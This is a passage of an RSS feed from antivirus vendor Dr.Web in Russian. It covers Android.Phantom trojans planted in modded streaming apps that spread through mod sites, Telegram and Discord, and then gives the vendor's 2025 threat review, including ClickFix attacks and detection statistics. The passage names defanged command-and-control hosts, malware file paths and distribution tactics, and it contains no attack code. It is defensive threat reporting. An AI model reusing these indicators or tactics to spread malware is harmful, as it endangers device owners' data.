gap-3"&gt;&lt;div class="img"&gt;&lt;a href="https://st.drweb.kz/static/new-www/news/2026/january/android_phantom/04_Android.Phantom.png" data-fancybox=""&gt;&lt;img src="https://st.drweb.kz/static/new-www/news/2026/january/android_phantom/04_Android.Phantom.1.png" alt="#drweb"&gt;&amp;nbsp;&lt;/a&gt;&lt;/div&gt;&lt;p class="text-center"&gt;&lt;i&gt;Сайт Spotify Pro&lt;/i&gt;&lt;/p&gt;&lt;/div&gt;&lt;/div&gt;&lt;p class="mt-5"&gt;И в специальных телеграм-каналах:&lt;/p&gt;&lt;div class="flex flex-col md:flex-row justify-center gap-3"&gt;&lt;div class="flex flex-col gap-1"&gt;&lt;div class="img"&gt;&lt;a href="https://st.drweb.kz/static/new-www/news/2026/january/android_phantom/05_Android.Phantom.png" data-fancybox=""&gt;&lt;img src="https://st.drweb.kz/static/new-www/news/2026/january/android_phantom/05_Android.Phantom.1.png" alt="#drweb"&gt;&amp;nbsp;&lt;/a&gt;&lt;/div&gt;&lt;p class="text-center"&gt;&lt;i&gt;Spotify Pro&lt;/i&gt;&lt;br&gt;&lt;i&gt;(54 400 подписчиков)&lt;/i&gt;&lt;/p&gt;&lt;/div&gt;&lt;div class="flex flex-col gap-1"&gt;&lt;div class="img"&gt;&lt;a href="https://st.drweb.kz/static/new-www/news/2026/january/android_phantom/06_Android.Phantom.png" data-fancybox=""&gt;&lt;img src="https://st.drweb.kz/static/new-www/news/2026/january/android_phantom/06_Android.Phantom.1.png" alt="#drweb"&gt;&amp;nbsp;&lt;/a&gt;&lt;/div&gt;&lt;p class="text-center"&gt;&lt;i&gt;Spotify Plus – Official&lt;/i&gt;&lt;br&gt;&lt;i&gt;(15 057 подписчиков)&lt;/i&gt;&lt;/p&gt;&lt;/div&gt;&lt;/div&gt;&lt;p class="mt-5"&gt;Моды Spotify, размещенные на сайтах и в указанных на скриншотах телеграм-каналах, содержат&amp;nbsp;&lt;a href="https://vms.drweb.kz/search/?q=Android.Phantom.2.origin&amp;lng=kk"&gt;&lt;b&gt;Android.Phantom.2.origin&lt;/b&gt;&lt;/a&gt;&amp;nbsp;и библиотеку для организации связи по стандарту WebRTC под Android.&lt;/p&gt;&lt;p&gt;Кроме модов Spotify, злоумышленники вшивают трояны в моды других популярных приложений: YouTube, Deezer, Netflix и др. Они размещены на специальных сайтах с модами:&lt;/p&gt;&lt;div class="img mb-3"&gt;&lt;a href="https://st.drweb.kz/static/new-www/news/2026/january/android_phantom/07_Android.Phantom.png" data-fancybox=""&gt;&lt;img src="https://st.drweb.kz/static/new-www/news/2026/january/android_phantom/07_Android.Phantom.1.png" alt="#drweb"&gt;&amp;nbsp;&lt;/a&gt;&lt;/div&gt;&lt;p class="text-center"&gt;&lt;i&gt;Сайт Apkmody&lt;/i&gt;&lt;/p&gt;&lt;div class="img mb-3"&gt;&lt;a href="https://st.drweb.kz/static/new-www/news/2026/january/android_phantom/08_Android.Phantom.png" data-fancybox=""&gt;&lt;img src="https://st.drweb.kz/static/new-www/news/2026/january/android_phantom/08_Android.Phantom.1.png" alt="#drweb"&gt;&amp;nbsp;&lt;/a&gt;&lt;/div&gt;&lt;p class="text-center"&gt;&lt;i&gt;Сайт Moddroid&lt;/i&gt;&lt;/p&gt;&lt;p&gt;Сайт Moddroid содержит раздел «Выбор редакции». Из 20 приложений в нем только 4 были чистыми. Остальные 16 содержали трояны семейства &lt;strong&gt;Android.Phantom&lt;/strong&gt;. Приложения на этих двух сайтах загружаются с одного CDN-сервера &lt;span class="string"&gt;hxxps[:]//cdn[.]topmongo[.]com&lt;/span&gt;. У этих сайтов есть свои телеграм-каналы, где пользователи скачивают зараженные троянам моды:&lt;/p&gt;&lt;div class="flex flex-col md:flex-row justify-center gap-3"&gt;&lt;div class="flex flex-col gap-1"&gt;&lt;div class="img"&gt;&lt;a href="https://st.drweb.kz/static/new-www/news/2026/january/android_phantom/09_Android.Phantom.png" data-fancybox=""&gt;&lt;img src="https://st.drweb.kz/static/new-www/news/2026/january/android_phantom/09_Android.Phantom.1.png" alt="#drweb"&gt;&amp;nbsp;&lt;/a&gt;&lt;/div&gt;&lt;p class="text-center"&gt;&lt;i&gt;Moddroid.com&lt;/i&gt;&lt;br&gt;&lt;i&gt;(87 653 подписчика)&lt;/i&gt;&lt;/p&gt;&lt;/div&gt;&lt;div class="flex flex-col gap-1"&gt;&lt;div class="img"&gt;&lt;a href="https://st.drweb.kz/static/new-www/news/2026/january/android_phantom/10_Android.Phantom.png" data-fancybox=""&gt;&lt;img src="https://st.drweb.kz/static/new-www/news/2026/january/android_phantom/10_Android.Phantom.1.png" alt="#drweb"&gt;&amp;nbsp;&lt;/a&gt;&lt;/div&gt;&lt;p class="text-center"&gt;&lt;i&gt;Apkmody Chat&lt;/i&gt;&lt;br&gt;&lt;i&gt;(6 297 подписчиков)&lt;/i&gt;&lt;/p&gt;&lt;/div&gt;&lt;/div&gt;&lt;p class="mt-5"&gt;Также для своих целей преступники используют сервера Discord. Самый большой из них — Spotify X, около 24 тысяч подписчиков.&lt;/p&gt;&lt;div class="img mb-3"&gt;&lt;a href="https://st.drweb.kz/static/new-www/news/2026/january/android_phantom/11_Android.Phantom.png" data-fancybox=""&gt;&lt;img src="https://st.drweb.kz/static/new-www/news/2026/january/android_phantom/11_Android.Phantom.1.png" alt="#drweb"&gt;&amp;nbsp;&lt;/a&gt;&lt;/div&gt;&lt;div class="img mb-3"&gt;&lt;a href="https://st.drweb.kz/static/new-www/news/2026/january/android_phantom/12_Android.Phantom.png" data-fancybox=""&gt;&lt;img src="https://st.drweb.kz/static/new-www/news/2026/january/android_phantom/12_Android.Phantom.1.png" alt="#drweb"&gt;&amp;nbsp;&lt;/a&gt;&lt;/div&gt;&lt;p&gt;Администраторы Discord-серверов не стесняются напрямую предлагать зараженные моды. Например, на скриншоте выше администратор от лица сервера предлагает скачать мод музыкального стриминга Deezer вместо Spotify, поскольку последний перестал работать.&lt;/p&gt;&lt;p&gt;По ссылке скачивается рабочий мод. Его код защищен коммерческим упаковщиком, внутри которого скрывается троян&amp;nbsp;&lt;a href="https://vms.drweb.kz/search/?q=Android.Phantom.1.origin&amp;lng=kk"&gt;&lt;b&gt;Android.Phantom.1.origin&lt;/b&gt;&lt;/a&gt;. Это загрузчик удаленного кода, по команде с сервера &lt;span class="string"&gt;hxxps[:]//dllpgd[.]click&lt;/span&gt; он загружает уже нам знакомые&amp;nbsp;&lt;a href="https://vms.drweb.kz/search/?q=Android.Phantom.2.origin&amp;lng=kk"&gt;&lt;b&gt;Android.Phantom.2.origin&lt;/b&gt;&lt;/a&gt;,&amp;nbsp;&lt;a href="https://vms.drweb.kz/search/?q=Android.Phantom.5&amp;lng=kk"&gt;&lt;b&gt;Android.Phantom.5&lt;/b&gt;&lt;/a&gt;&amp;nbsp;и троян-шпион &lt;a href="https://vms.drweb.kz/search/?q=Android.Phantom.5.origin&amp;lng=kk"&gt;&lt;b&gt;Android.Phantom.5.origin&lt;/b&gt;&lt;/a&gt;. Последний отправляет информацию об устройстве злоумышленникам, в том числе номер телефона, геолокацию, список установленных приложений.&lt;/p&gt;&lt;div class="img mb-3"&gt;&lt;a href="https://st.drweb.kz/static/new-www/news/2026/january/android_phantom/13_Android.Phantom.png" data-fancybox=""&gt;&lt;img src="https://st.drweb.kz/static/new-www/news/2026/january/android_phantom/13_Android.Phantom.1.png" alt="#drweb"&gt;&amp;nbsp;&lt;/a&gt;&lt;/div&gt;&lt;p&gt;Этот скриншот с сервера показывает, на каких языках говорят пользователи, которые становятся объектами заражения. Для доступа к чатам на языках, отличных от английского, необходимо поставить реакцию с соответствующим флагом. Больше всего отметились пользователи, говорящие на испанском, французском, немецком, польском и итальянском языках (не считая английского, который является основным языком сервера). Также администраторы сервера не предусмотрели чатов для многих стран Азии.&lt;/p&gt;&lt;p&gt;Трояны могут нанести существенный вред владельцам зараженных устройств. Перечислим несколько возможных исходов:&lt;/p&gt;&lt;ul class="list"&gt;&lt;li&gt;&lt;strong&gt;Невольное соучастие.&lt;/strong&gt; Смартфон пользователя может быть использован в качестве бота при DDoS-атаке, тем самым делая владельца невольным соучастником киберпреступления.&lt;/li&gt;&lt;li&gt;&lt;strong&gt;Незаконная активность.&lt;/strong&gt; Через устройство злоумышленники могут совершать незаконную онлайн-деятельность, к примеру, использовать смартфон в мошеннических схемах или рассылать спам-сообщения.&lt;/li&gt;&lt;li&gt;&lt;strong&gt;Повышенное потребление заряда и трафика.&lt;/strong&gt; Посторонняя деятельность разряжает аккумулятор и расходует интернет-трафик.&lt;/li&gt;&lt;li&gt;&lt;strong&gt;Утечка персональных данных.&lt;/strong&gt; &lt;a href="https://vms.drweb.kz/search/?q=Android.Phantom.5.origin&amp;lng=kk"&gt;&lt;b&gt;Android.Phantom.5.origin&lt;/b&gt;&lt;/a&gt; является шпионом и может передавать данные об устройстве и владельце.&lt;/li&gt;&lt;/ul&gt;&lt;p&gt;Трояны этого семейства представляют угрозу для владельцев мобильных устройств на Android, не защищенных актуальным антивирусным ПО. Российские пользователи испытывают трудности с регистрацией в зарубежных приложениях или оплатой подписок. Ситуация подталкивает искать и использовать альтернативные, зачастую полулегальные, способы получения услуг этих компаний. Эта ситуация на руку вирусописателям, ведь пользователям приходится рисковать и доверять сомнительным вариантам. Особую группу риска составляют дети, которые не думают о правилах цифровой гигиены, желая всего лишь поиграть, послушать музыку или посмотреть видеоклипы.&lt;/p&gt;&lt;p&gt;Мы рекомендуем не скачивать моды на сомнительных сайтах и в каналах. Как правило, проверка источников модов или приложений требует времени, опыта и насмотренности. Поэтому лучший вариант обеспечить себе и своим близким гарантированное спокойствие — использовать Dr.Web Security Space для мобильных устройств. Он защитит не только ваши смартфоны, но и другие умные устройства: игровые консоли, планшеты, smartTV.&lt;/p&gt;
&lt;p&gt;&lt;a href="https://github.com/DoctorWebLtd/malware-iocs/blob/master/Android.Phantom/README.adoc"&gt;Индикаторы компрометации&lt;/a&gt;&lt;br /&gt;
Подробнее о &lt;a href="https://vms.drweb.kz/search/?q=Android.Phantom.1.origin&amp;lng=kk"&gt;&lt;b&gt;Android.Phantom.1.origin&lt;/b&gt;&lt;/a&gt;&lt;br /&gt;
Подробнее о &lt;a href="https://vms.drweb.kz/search/?q=Android.Phantom.2.origin&amp;lng=kk"&gt;&lt;b&gt;Android.Phantom.2.origin&lt;/b&gt;&lt;/a&gt;&lt;br /&gt;
Подробнее о &lt;a href="https://vms.drweb.kz/search/?q=Android.Phantom.3&amp;lng=kk"&gt;&lt;b&gt;Android.Phantom.3&lt;/b&gt;&lt;/a&gt;&lt;br /&gt;
Подробнее о &lt;a href="https://vms.drweb.kz/search/?q=Android.Phantom.4.origin&amp;lng=kk"&gt;&lt;b&gt;Android.Phantom.4.origin&lt;/b&gt;&lt;/a&gt;&lt;br /&gt;
Подробнее о &lt;a href="https://vms.drweb.kz/search/?q=Android.Phantom.5&amp;lng=kk"&gt;&lt;b&gt;Android.Phantom.5&lt;/b&gt;&lt;/a&gt;&lt;br /&gt;
Подробнее о &lt;a href="https://vms.drweb.kz/search/?q=Android.Phantom.5.origin&amp;lng=kk"&gt;&lt;b&gt;Android.Phantom.5.origin&lt;/b&gt;&lt;/a&gt;&lt;/p&gt;</description></item><item><guid>https://news.drweb.kz/show/?i=15102&amp;lng=kk</guid><title>«Доктор Веб»: обзор вирусной активности за 2025 год</title><link>https://news.drweb.kz/show/?i=15102&amp;lng=kk&amp;c=5</link><pubDate>Thu, 15 Jan 2026 00:00:00 GMT</pubDate><description>&lt;p&gt;&lt;b&gt;15 января 2026 года&lt;/b&gt;&lt;/p&gt;

&lt;p&gt;&lt;newslead&gt;В 2025 году одними из самых активных угроз стали трояны, предназначенные для показа рекламы. Пользователи также сталкивались с различными вредоносными скриптами и троянскими приложениями, которые запускают в инфицированной системе другое вредоносное ПО. В почтовом трафике чаще всего выявлялись троянские программы-загрузчики, бэкдоры, эксплойты, вредоносные скрипты и фишинговые документы.&lt;/newslead&gt;&lt;/p&gt;

&lt;p&gt;Среди мобильных угроз наибольшее распространение получили рекламные трояны и программы-подделки, используемые в различных мошеннических схемах. Также отмечался рост активности банковских троянов. При этом вирусные аналитики «Доктор Веб» обнаружили десятки новых вредоносных, нежелательных и рекламных программ в каталоге Google Play.&lt;/p&gt;

&lt;p&gt;По сравнению с 2024 годом сократилось количество обращений пользователей за расшифровкой файлов. В то же время в течение года наши интернет-аналитики фиксировали рост числа мошеннических сайтов, созданных для кражи учетных записей пользователей мессенджера Telegram. Кроме того, распространение вновь получили нежелательные сайты финансовой тематики.&lt;/p&gt;

&lt;p&gt;В 2025 году антивирусная лаборатория «Доктор Веб» расследовала несколько таргетированных атак, одна из которых была совершена на российское машиностроительное предприятие. В ходе нее злоумышленники использовали ряд вредоносных приложений, с помощью которых пытались получить конфиденциальные данные с зараженных компьютеров. Наши специалисты установили, что к атаке была причастна хакерская группировка Scaly Wolf. Другой инцидент произошел с одним из российских государственных учреждений, которое подверглось нападению хакерской группы Cavalry Werewolf. Вирусные аналитики «Доктор Веб» выявили множество вредоносных инструментов злоумышленников, а также изучили особенности группировки и характерные для нее действия внутри скомпрометированных сетей.&lt;/p&gt;

&lt;p&gt;В течение 2025 года компания «Доктор Веб» также сообщала о ряде других инцидентов информационной безопасности. В январе наша антивирусная лаборатория выявила активную кампанию по добыче криптовалюты Monero, организованную с использованием множества различных вредоносных программ. А в апреле мы проинформировали о трояне, найденном в прошивке ряда моделей Android-смартфонов. С его помощью киберпреступники похищали криптовалюту. Кроме того, в апреле наши специалисты выявили Android-трояна, которого злоумышленники внедрили в одну из версий популярной картографической программы и использовали для слежки за российскими военнослужащими.&lt;/p&gt;

&lt;p&gt;В июле эксперты «Доктор Веб» рассказали о новом семействе троянов, созданных для кражи криптовалюты и паролей. Злоумышленники распространяли их под видом модов, читов и патчей для игр. В августе вирусные аналитики предупредили о распространении многофункционального бэкдора для мобильных устройств, который был нацелен на представителей российского бизнеса. Киберпреступники управляли им дистанционно, похищая с его помощью конфиденциальные данные и следя за жертвами.&lt;/p&gt;

&lt;p&gt;В октябре мы рассказали о бэкдоре для Android-устройств, которого киберпреступники распространяют в составе модифицированных версий мессенджера Telegram X. Эта вредоносная программа похищает логины и пароли от учетных записей Telegram и другие конфиденциальные данные. С ее помощью вирусописатели могут управлять взломанными аккаунтами жертв и полностью контролировать сам мессенджер, выполняя различные действия от имени пользователей.&lt;/p&gt;

&lt;p&gt;В декабре на нашем сайте вышел материал о трояне, который «накручивает» популярность сайтов и для этого притворяется человеком, чтобы его действия не заблокировала антибот-защита интернет-площадок. Вредоносная программа самостоятельно ищет нужные сайты в поисковых системах, открывает их и выполняет клики на веб-страницах в соответствии с получаемыми от злоумышленников параметрами.&lt;/p&gt;

&lt;p&gt;В 2025 году также отмечался рост популярности атак ClickFix, при которых злоумышленники применяют социальную инженерию, чтобы пользователи самостоятельно запустили вредоносный код на своих устройствах.&lt;/p&gt;

&lt;div class="colorful"&gt;
    &lt;h3&gt;Главные тенденции года&lt;/h3&gt;
    &lt;ul class="list"&gt;
        &lt;li&gt;Отмечалась высокая активность рекламных троянов&lt;/li&gt;
        &lt;li&gt;Произошли новые таргетированные атаки&lt;/li&gt;
        &lt;li&gt;Наблюдался рост популярности атак с применением метода ClickFix&lt;/li&gt;
        &lt;li&gt;Снизилось число инцидентов с троянскими программами-шифровальщиками&lt;/li&gt;
        &lt;li&gt;Увеличилось количество детектирований банковских троянов для Android&lt;/li&gt;
        &lt;li&gt;Были выявлены новые случаи заражения прошивок Android-устройств&lt;/li&gt;
        &lt;li&gt;В каталоге Google Play вновь распространялись различные вредоносные и нежелательные программы&lt;/li&gt;
    &lt;/ul&gt;
&lt;/div&gt;

&lt;h3&gt;Наиболее интересные события 2025 года&lt;/h3&gt;

&lt;p&gt;В январе 2025 года специалисты «Доктор Веб» &lt;a href="https://news.drweb.kz/show/?i=14976" target="_blank"&gt;выявили&lt;/a&gt; кампанию по добыче криптовалюты Monero с использованием вредоносного майнера SilentCryptoMiner. Его файлы были замаскированы под различное ПО, например программы для совершения видеозвонков. При заражении компьютеров они удаляли другие майнеры, которые могли быть ранее установлены в систему. В рамках этой кампании для распространения некоторых вредоносных компонентов злоумышленники применяли стеганографию — прием, позволяющий скрыть одни данные среди других (например, в изображениях). После скачивания специальным образом сформированных изображений соответствующие компоненты SilentCryptoMiner извлекались из них и запускались.&lt;/p&gt;

&lt;p&gt;В апреле наши вирусные аналитики &lt;a href="https://news.drweb.kz/show/?i=15002" target="_blank"&gt;проинформировали&lt;/a&gt; о трояне &lt;a href="https://vms.drweb.kz/search/?q=Android.Clipper.31&amp;lng=kk"&gt;&lt;b&gt;Android.Clipper.31&lt;/b&gt;&lt;/a&gt;, обнаруженном в прошивке ряда бюджетных моделей Android-смартфонов. Злоумышленники встроили его в модифицированную версию мессенджера WhatsApp, который затем предустановили на устройства, скомпрометировав цепочку поставок некоторых производителей. &lt;a href="https://vms.drweb.kz/search/?q=Android.Clipper.31&amp;lng=kk"&gt;&lt;b&gt;Android.Clipper.31&lt;/b&gt;&lt;/a&gt; перехватывает отправляемые и принимаемые в мессенджере сообщения, ищет в них адреса криптокошельков Tron и Ethereum и заменяет их адресами, которые принадлежат киберпреступникам. При этом троян скрывает подмену, и жертвы видят в таких сообщениях корректные адреса криптокошельков.&lt;/p&gt;

&lt;p&gt;В этом же месяце эксперты «Доктор Веб» обнаружили Android-трояна &lt;a href="https://vms.drweb.kz/search/?q=Android.Spy.1292.origin&amp;lng=kk"&gt;&lt;b&gt;Android.Spy.1292.origin&lt;/b&gt;&lt;/a&gt;, которого злоумышленники внедрили в одну из версий картографической программы Alpine Quest и использовали для слежки за российскими военнослужащими. Вредоносное приложение собирало конфиденциальную информацию и позволяло атакующим красть файлы с зараженных устройств.&lt;/p&gt;

&lt;p&gt;В июле на сайте компании «Доктор Веб» вышел &lt;a href="https://news.drweb.kz/show/?i=15036" target="_blank"&gt;материал&lt;/a&gt; о троянских программах &lt;a href="https://vms.drweb.kz/search/?q=Trojan.Scavenger&amp;lng=kk"&gt;&lt;b&gt;Trojan.Scavenger&lt;/b&gt;&lt;/a&gt;, предназначенных для кражи криптовалюты и паролей. Злоумышленники распространяли их под видом модов, читов и патчей для игр. Эти вредоносные приложения запускались с использованием легитимного ПО, в том числе через эксплуатацию в нем уязвимостей класса DLL Search Order Hijacking.&lt;/p&gt;

&lt;p&gt;В августе наши специалисты &lt;a href="https://news.drweb.ru/show/?i=15047" target="_blank"&gt;уведомили&lt;/a&gt; о распространении многофункционального бэкдора &lt;a href="https://vms.drweb.kz/search/?q=Android.Backdoor.916.origin&amp;lng=kk"&gt;&lt;b&gt;Android.Backdoor.916.origin&lt;/b&gt;&lt;/a&gt;, который был нацелен на представителей российских компаний. Вредоносное приложение под видом антивируса распространялось через личные сообщения в мессенджерах. Попадая на целевые устройства, &lt;a href="https://vms.drweb.kz/search/?q=Android.Backdoor.916.origin&amp;lng=kk"&gt;&lt;b&gt;Android.Backdoor.916.origin&lt;/b&gt;&lt;/a&gt; собирал конфиденциальные данные и позволял атакующим следить за жертвами.&lt;/p&gt;

&lt;p&gt;Кроме того, в августе антивирусная лаборатория «Доктор Веб» &lt;a href="https://news.drweb.ru/show/?i=15046" target="_blank"&gt;выпустила исследование&lt;/a&gt; таргетированной атаки группировки Scaly Wolf на российское машиностроительное предприятие. Киберпреступники задействовали целый набор вредоносных инструментов, среди которых одним из основных стал модульный бэкдор Updatar. Он позволял атакующим собирать конфиденциальные данные с зараженных компьютеров.&lt;/p&gt;

&lt;p&gt;В октябре эксперты «Доктор Веб» &lt;a href="https://news.drweb.kz/show/?i=15076" target="_blank"&gt;рассказали&lt;/a&gt; о бэкдоре &lt;a href="https://vms.drweb.kz/search/?q=Android.Backdoor.Baohuo.1.origin&amp;lng=kk"&gt;&lt;b&gt;Android.Backdoor.Baohuo.1.origin&lt;/b&gt;&lt;/a&gt;, встроенном в модифицированные злоумышленниками версии мессенджера Telegram X. &lt;a href="https://vms.drweb.kz/search/?q=Android.Backdoor.Baohuo.1.origin&amp;lng=kk"&gt;&lt;b&gt;Android.Backdoor.Baohuo.1.origin&lt;/b&gt;&lt;/a&gt; крадет логины и пароли от учетных записей Telegram, а также похищает ряд других конфиденциальных данных. Вредоносная программа позволяет злоумышленникам получить полный контроль над учетной записью пользователя и управлять мессенджером, выполняя в нем действия от имени жертвы. Например, атакующие могут незаметно вступать в Telegram-каналы и покидать их, а также скрывать новые авторизованные устройства в интерфейсе троянской модификации Telegram X.&lt;/p&gt;

&lt;p&gt;В ноябре мы опубликовали &lt;a href="https://news.drweb.kz/show/?i=15078" target="_blank"&gt;исследование&lt;/a&gt; таргетированной атаки хакерской группировки Cavalry Werewolf на российское государственное учреждение. При анализе инцидента эксперты «Доктор Веб» обнаружили множество вредоносных инструментов киберпреступников, включая инструменты с открытым исходным кодом. Вирусные аналитики изучили особенности группировки и выяснили, что ее участники предпочитают использовать бэкдоры с функциональностью обратного шелла и часто применяют Telegram API для управления зараженными компьютерами. Кроме того, они начинают атаки с отправки фишинговых писем якобы от имени государственных структур и прикрепляют к таким сообщениям вредоносное ПО, замаскированное под различные официальные документы.&lt;/p&gt;

&lt;p&gt;В декабре компания «Доктор Веб» опубликовала &lt;a href="https://news.drweb.kz/show/?i=15090" target="_blank"&gt;анализ&lt;/a&gt; вредоносного приложения &lt;a href="https://vms.drweb.kz/search/?q=Trojan.ChimeraWire&amp;lng=kk"&gt;&lt;b&gt;Trojan.ChimeraWire&lt;/b&gt;&lt;/a&gt;, который искусственно увеличивает популярность сайтов, притворяясь для этого человеком. Троянское приложение ищет нужные сайты в поисковых системах Google и Bing, открывает их и выполняет клики на загруженных веб-страницах в соответствии с полученными от злоумышленников заданиями. &lt;a href="https://vms.drweb.kz/search/?q=Trojan.ChimeraWire&amp;lng=kk"&gt;&lt;b&gt;Trojan.ChimeraWire&lt;/b&gt;&lt;/a&gt; устанавливается на компьютеры при помощи ряда вредоносных программ, которые эксплуатируют уязвимости класса DLL Search Order Hijacking.&lt;/p&gt;

&lt;p&gt;В течение 2025 года наблюдался рост популярности атак с использованием метода ClickFix. Он заключается в том, что злоумышленники применяют социальную инженерию, обманом подталкивая потенциальных жертв к самостоятельному запуску вредоносного кода. Когда пользователи попадают на вредоносный или скомпрометированный сайт, тот сообщает им о якобы возникшей ошибке или о необходимости обновить браузер и предлагает «исправить» проблему. Для этого, в зависимости от варианта атаки, пользователей просят либо скопировать указанные на странице строки, либо просто нажать на соответствующую кнопку (например, «Обновить» или «Исправить»). В последнем случае нужное содержимое будет автоматически скопировано в буфер обмена. Затем их просят запустить командную строку или терминал PowerShell, вставить туда содержимое буфера обмена и нажать клавишу Enter. В результате жертвы самостоятельно исполняют вредоносный код, который запускает цепочку заражения компьютера. Подробнее об атаках ClickFix можно узнать в соответствующем &lt;a href="https://news.drweb.kz/show/?i=15074" target="_blank"&gt;материале&lt;/a&gt; на нашем сайте.&lt;/p&gt;

&lt;h3&gt;Вирусная обстановка&lt;/h3&gt;

&lt;p&gt;По данным статистики детектирований антивируса Dr.Web, в 2025 году общее число обнаруженных угроз возросло на 5,45% по сравнению с 2024 годом. Число уникальных угроз снизилось на 15,89%. Чаще всего пользователи сталкивались с различными вредоносными скриптами и рекламными троянами. Кроме того, распространение получили трояны, которые используются для запуска других вредоносных программ. Также пользователям вновь угрожали троянские приложения, которые созданы на скриптовом языке AutoIt и распространяются в составе другого вредоносного ПО для затруднения его обнаружения.&lt;/p&gt;

&lt;div class="img mb-3"&gt;
    &lt;a href="https://st.drweb.kz/static/new-www/news/2026/january/review_common/01_stat_2025_ru.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.kz/static/new-www/news/2026/january/review_common/01_stat_2025_ru.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;

&lt;dl&gt;
    &lt;dt&gt;&lt;b&gt;VBS.KeySender.6&lt;/b&gt;&lt;/dt&gt;
    &lt;dt&gt;&lt;b&gt;VBS.KeySender.7&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Вредоносный скрипт, который в бесконечном цикле ищет окна с текстом &lt;span class="string"&gt;mode extensions&lt;/span&gt;, &lt;span class="string"&gt;разработчика&lt;/span&gt; и &lt;span class="string"&gt;розробника&lt;/span&gt; и шлет им событие нажатия кнопки Escape, принудительно закрывая их.&lt;/dd&gt;
    &lt;dt&gt;&lt;b&gt;Trojan.BPlug.4242&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Детектирование вредоносного компонента браузерного расширения WinSafe. Этот компонент представляет собой сценарий JavaScript, который демонстрирует навязчивую рекламу в браузерах.&lt;/dd&gt;
    &lt;dt&gt;&lt;b&gt;Trojan.Starter.8319&lt;/b&gt;&lt;/dt&gt;
    &lt;dt&gt;&lt;b&gt;Trojan.Starter.8326&lt;/b&gt;&lt;/dt&gt;
    &lt;dt&gt;&lt;b&gt;Trojan.Starter.8332&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Детектирование вредоносных XML-скриптов, которые запускают трояна &lt;a href="https://vms.drweb.kz/search/?q=Trojan.AutoIt.289&amp;lng=kk"&gt;&lt;b&gt;Trojan.AutoIt.289&lt;/b&gt;&lt;/a&gt; и его компоненты.&lt;/dd&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb.kz/search/?q=JS.Siggen5.44590&amp;lng=kk"&gt;&lt;b&gt;JS.Siggen5.44590&lt;/b&gt;&lt;/a&gt;&lt;/dt&gt;
    &lt;dd&gt;Вредоносный код, добавленный в публичную JavaScript-библиотеку es5-ext-main. Демонстрирует определенное сообщение, если пакет установлен на сервер с часовым поясом российских городов.&lt;/dd&gt;
    &lt;dt&gt;&lt;b&gt;Trojan.Siggen30.53926&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Хост-процесс модифицированного злоумышленниками фреймворка Electron, мимикрирующий под компонент приложения Steam (Steam Client WebHelper) и загружающий JavaScript-бэкдор.&lt;/dd&gt;
    &lt;dt&gt;&lt;b&gt;JS.MalVpn.1&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Вредоносный скрипт, который различные вредоносные программы используют для соединения с управляющими серверами.&lt;/dd&gt;
    &lt;dt&gt;&lt;b&gt;Trojan.Siggen31.34463&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Троян, написанный на языке программирования Go и предназначенный для загрузки в целевую систему различных майнеров и рекламного ПО. Вредоносная программа является DLL-файлом и располагается в &lt;span class="string"&gt;%appdata%\utorrent\lib.dll&lt;/span&gt;. Для своего запуска эксплуатирует уязвимость класса DLL Search Order Hijacking в торрент-клиенте uTorrent.&lt;/dd&gt;
&lt;/dl&gt;

&lt;p&gt;В почтовом трафике в 2025 году чаще всего встречались троянские программы, которые скачивали и устанавливали другое вредоносное ПО. Злоумышленники также распространяли через электронные письма различные бэкдоры, эксплойты, фишинговые документы и вредоносные скрипты.&lt;/p&gt;

&lt;div class="img mb-3"&gt;
    &lt;a href="https://st.drweb.kz/static/new-www/news/2026/january/review_common/02_email_traffic_2025_ru.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.kz/static/new-www/news/2026/january/review_common/02_email_traffic_2025_ru.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;

&lt;dl&gt;
    &lt;dt&gt;&lt;b&gt;W97M.DownLoader.2938&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Семейство троянов-загрузчиков, использующих уязвимости документов Microsoft Office. Они предназначены для загрузки других вредоносных программ на атакуемый компьютер.&lt;/dd&gt;
    &lt;dt&gt;&lt;b&gt;Exploit.CVE-2017-11882.123&lt;/b&gt;&lt;/dt&gt;
    &lt;dt&gt;&lt;b&gt;Exploit.CVE-2018-0798.4&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Эксплойты для использования уязвимостей в ПО Microsoft Office, позволяющие выполнить произвольный код.&lt;/dd&gt;
    &lt;dt&gt;&lt;b&gt;JS.Phishing.684&lt;/b&gt;&lt;/dt&gt;
    &lt;dt&gt;&lt;b&gt;JS.Phishing.745&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Вредоносный сценарий на языке JavaScript, формирующий фишинговую веб-страницу.&lt;/dd&gt;
    &lt;dt&gt;&lt;b&gt;BackDoor.AgentTeslaNET.20&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Вредоносная программа-шпион, предназначенная для кражи конфиденциальной информации. Например, она собирает и передает злоумышленникам логины и пароли из множества приложений, таких как браузеры, мессенджеры, почтовые клиенты, базы данных и т. д. Она также крадет данные из буфера обмена, реализует функциональность кейлоггера и может создавать снимки экрана (скриншоты).&lt;/dd&gt;
    &lt;dt&gt;&lt;b&gt;Win32.Expiro.153&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Файловый вирус, заражающий исполняемые файлы Windows. Его основное предназначение заключается в хищении паролей от различных программ.&lt;/dd&gt;
    &lt;dt&gt;&lt;b&gt;JS.DownLoader.1225&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Эвристическое детектирование для ZIP-архивов, содержащих скрипты JavaScript с подозрительными именами.&lt;/dd&gt;
    &lt;dt&gt;&lt;b&gt;Trojan.PackedNET.3223&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Детектирование вредоносных программ, защищенных упаковщиком.&lt;/dd&gt;
    &lt;dt&gt;&lt;b&gt;Trojan.AutoIt.1413&lt;/b&gt;&lt;/dt&gt;
